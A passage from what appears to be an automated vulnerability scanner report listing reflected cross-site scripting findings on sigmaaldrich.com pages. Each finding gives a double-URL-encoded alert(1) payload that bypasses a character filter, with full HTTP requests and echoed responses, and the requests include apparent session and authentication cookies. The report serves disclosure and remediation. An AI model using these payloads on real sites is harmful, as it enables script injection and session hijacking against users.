bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:36 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/d4308";alert(1)//886483ea1d9","E404") ;
   </script>
...[SNIP]...

1.54. http://www.sigmaaldrich.com/chemistry/chemistry-products1.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemistry-products1.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe1bd%2522%253balert%25281%2529%252f%252f4c13458dba4 was submitted in the REST URL parameter 1. This input was echoed as fe1bd";alert(1)//4c13458dba4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistryfe1bd%2522%253balert%25281%2529%252f%252f4c13458dba4/chemistry-products1.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:20 GMT
Content-Length: 28938
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryfe1bd";alert(1)//4c13458dba4/chemistry-products1.html","E404") ;
   </script>
...[SNIP]...

1.55. http://www.sigmaaldrich.com/chemistry/chemistry-products1.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemistry-products1.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6952%2522%253balert%25281%2529%252f%252f490a10955c0 was submitted in the REST URL parameter 2. This input was echoed as d6952";alert(1)//490a10955c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/d6952%2522%253balert%25281%2529%252f%252f490a10955c0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:22 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/d6952";alert(1)//490a10955c0","E404") ;
   </script>
...[SNIP]...

1.56. http://www.sigmaaldrich.com/chemistry/chemistry-services.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemistry-services.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6544%2522%253balert%25281%2529%252f%252f072c5b7bf71 was submitted in the REST URL parameter 1. This input was echoed as b6544";alert(1)//072c5b7bf71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistryb6544%2522%253balert%25281%2529%252f%252f072c5b7bf71/chemistry-services.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:17 GMT
Content-Length: 28937
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryb6544";alert(1)//072c5b7bf71/chemistry-services.html","E404") ;
   </script>
...[SNIP]...

1.57. http://www.sigmaaldrich.com/chemistry/chemistry-services.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemistry-services.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca178%2522%253balert%25281%2529%252f%252fcb5ecdfb5ed was submitted in the REST URL parameter 2. This input was echoed as ca178";alert(1)//cb5ecdfb5ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/ca178%2522%253balert%25281%2529%252f%252fcb5ecdfb5ed HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:19 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/ca178";alert(1)//cb5ecdfb5ed","E404") ;
   </script>
...[SNIP]...

1.58. http://www.sigmaaldrich.com/chemistry/drug-discovery.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/drug-discovery.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a1df%2522%253balert%25281%2529%252f%252fbbb9e6e45da was submitted in the REST URL parameter 1. This input was echoed as 7a1df";alert(1)//bbb9e6e45da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry7a1df%2522%253balert%25281%2529%252f%252fbbb9e6e45da/drug-discovery.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:25 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


